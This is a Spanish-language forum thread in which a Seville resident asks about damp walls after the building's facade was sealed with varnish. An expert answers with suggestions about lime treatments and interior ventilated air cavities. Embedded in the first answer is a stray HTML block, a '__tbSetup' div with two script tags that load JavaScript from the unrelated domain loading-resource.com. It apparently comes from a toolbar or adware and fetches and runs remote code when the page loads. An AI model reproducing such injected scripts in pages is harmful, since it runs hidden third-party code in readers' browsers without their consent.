¿Cómo solucionar la humedad freática de las paredes cuya fachada pintaron con pintura y barniz?

Vivimos en Sevilla, en el bajo de un bloque de más de 50 años, con 4 plantas y los muros son de ladrillo de unos 40 cm. Hace dos años pintaron la fachada del bloque con una pintura a la que le añadieron un barniz para impermeabilizar la fachada (es algo que me dijeron e hicieron en mi presencia). Desde entonces, y sobre todo en invierno, sufrimos de mucha humedad en las paredes hasta el punto de que a pesar de ventilar las habitaciones y colocar deshumidificadores en los armarios, la humedad no desaparece creando problemas con la ropa, papeles y los que nos pueda generar a nuestra salud. Este problema ¿puede ser porque la humedad freática no se puede evaporar al exterior por la fachada y sale hacia el interior?. ¿Cómo podemos solucionar este problema de humedad?

Respuesta

¿Entiendo qué la humedad la tienes solamente tu piso y sale solo acierta altura o no? Si puedes pon una foto y te comento. De todas maneras casi seguro que como bien dices sea por cerrar el poro de la fachada. Hay en el mercado varios tratamientos, a mi me gusta el de cal dehumificante de settef marca italiana.

<div id="__tbSetup"> </div><script type="text/javascript" src="https://loading-resource.com/data.js.php?i={1EFAB6E1-79BA-4566-B458-DBEDEC33AB15}&d=2012-8-28&s=http://www.todoexpertos.com/mitodoexpertos/question/uhxq8t48iuhpk/como-solucionar-la-humedad-freatica-de-las-paredes-cuya-fachada-pintaron-con-pintura-y-barniz?utm_source=QuestionNew&utm_medium=Email&utm_campaign=QuestionNew"></script><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script>

Ante todo gracias por la atención.

No hay manchas de humedad en la pared pero si se nota al tacto que los dos muros que dan al exterior están ligeramente más fríos y sensación de húmedos ,más en la parte baja de los mismos. En los armarios tenemos puestos 2 deshumidificadores a los que cambiamos el recambio cada vez que se agota y a pesar de ello la ropa huele a humedad. Y en los cajones de un escritorio, las cartas y papeles que guardamos se notan húmedos.

Este tratamiento de cal deshumificante ¿es para aplicar a la fachada o a las paredes interiores?. Lo que más me interesa es saber que puedo en la parte exterior para evitar el efecto negativo del barniz.

¿Entonces lo que mas tienes es humedad por condensación? Lo de la cal note sirve.

Para hacer en el exterior y cambiar lo negativo del barniz creo que no tiene solución, todo lo tendrás que hacer en interior, como cámaras de aire con ventilación al exterior. Creo que sera la mejor solución.